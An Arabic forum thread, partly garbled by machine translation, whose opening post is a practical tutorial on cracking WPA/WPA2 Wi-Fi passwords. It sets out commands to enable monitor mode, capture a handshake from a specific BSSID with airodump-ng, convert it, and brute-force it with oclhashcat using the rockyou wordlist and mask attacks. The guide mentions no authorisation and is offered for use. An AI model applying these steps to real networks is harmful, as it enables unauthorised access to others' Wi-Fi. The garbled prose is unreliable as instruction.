حالة الموضوع:
مغلق
  1. منير

    منير Guest

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله



    [​IMG]

    البايرايت هو الأداة التي تستخدم القوة من GPU لكسر كلمات المرور مع وصول لاسلكية نقطة WPA/WPA2-PSK.
    في إدخال اليوم ، وسوف نعرض بديلا زائد oclhashcat

    الأول هو لتحميل وتثبيت الإصدار الأحدث من aircrack - NG، وهي متاحة على: http://nightly.aircrack-ng.org/aircrack-ng/trunk/

    هذا أمر مهم لأن أحدث الإصدارات تشمل اثنين من الخيارات ليست متاحة في الحزم وزعت بعض الأنظمة.


    cd /tmp

    <b><b>
    wget -q hxxp://nightly.aircrack-ng.org/aircrack-ng/trunk/aircrack

    ng-trunk-2011-11-19-r1997.tar.gz

    tar -zxf aircrack-ng-trunk-2011-11-19-r1997.tar.gz

    cd aircrack-ng-trunk-2011-11-19-r1997/

    make && make install
    المثال :
    [​IMG] والشيء التالي

    ifconfig wlan0 down

    iwconfig wlan0 mode monitor

    airmon-ng start wlan0

    [​IMG]

    بدأ تطبيق airodump



    airodump-ng -c 2 mon0 --bssid F4:EC:38:9F:D0:2D -w dump.pcap



    [​IMG]

    حتى هنا هو أكثر أو أقل ما فعلته طوال العمر للحصول على كلمة السر. الآن لجعل القوة الغاشمة باستخدام oclhashcat الجرافيك بالاضافة الى ذلك ، اتبع الخطوات الثلاث الأخيرة.

    لتنظيف التقاط والتصدير إلى تنسيق آخر بحيث يمكنك قراءة مطلوب أداة oclhashcat بالإضافة إلى إصدار محدث من aircrack - NG.​
    wpaclean التطبيق ، والذي انعكس في الترتيب الذي يتم قبول الملفات. أولا ، ومن ثم الوجهة المنزل. مع الأمر الأول يخلق wpaclean.cap الملف، والثاني، بدءا من الملف النهائي wpaclean.cap يتم إنشاؤها dump2.hccp

    wpaclean wpaclean.cap dump.pcap-01.cap
    aircrack-ng wpaclean.cap -J dump2

    خيار آخر لإنشاء HCCP هو رفع الملف لهذا الموقع:http://hashcat.net/cap2hccap/


    نستخدم أحدث إصدار من oclhashcat + تشير إلى أنه من WPA (م 2500)، ويستخدم rockyou القاموس.


    cudaHashcat-plus64.bin -m 2500 dump2.hccap rockyou.txt




    [​IMG]

    هذا المثال يدل على سرعة 3900 محاولات في الثانية مع نفيديا كوادرو 1000M من الكمبيوتر المحمول، على عكس وحدة المعالجة المركزية I7 في الفريق نفسه ، مع مفاتيح aircrack في الثانية الواحدة التي حققها 1020 أو 3300 البايرايت محاولات الحصول عليها باستخدام الجرافيك كذلك.

    إذا لم يكن الحظ مع القواميس التقليدية، يجب أن يكون أداة توليد maskprocessor أقنعة لمحاولة بها مع القوة الغاشمة التقليدية. في هذا المثال سنحاول صغيرة الأحرف الكبيرة والأرقام والأحرف الخاصة بطول 5

    mp64.bin -1=?l?u?d?s ?1?1?1?1?1 | ./clhashcat-plus64.bin -m 2500 dump2.hccap


    لاتنسو ردكم على الموضوع
    </b>
    بالتوفيق ، واي استفسارات انا متواجد بالموضوع
     
  2. MaDe IN K.s.A

    MaDe IN K.s.A <div class="smallfont"><script src="http://www.iq- ExpErt DeveloPer

    الأنتساب:
    ‏16 ديسمبر 2011
    المشاركات:
    111
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الإقامة:
    ksa
    رد: باستخدام الجرافيك مع Haoclshcat لكسر كلمة السر WPA/WPA

    يعطيك العافيه حبيبي&:"
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة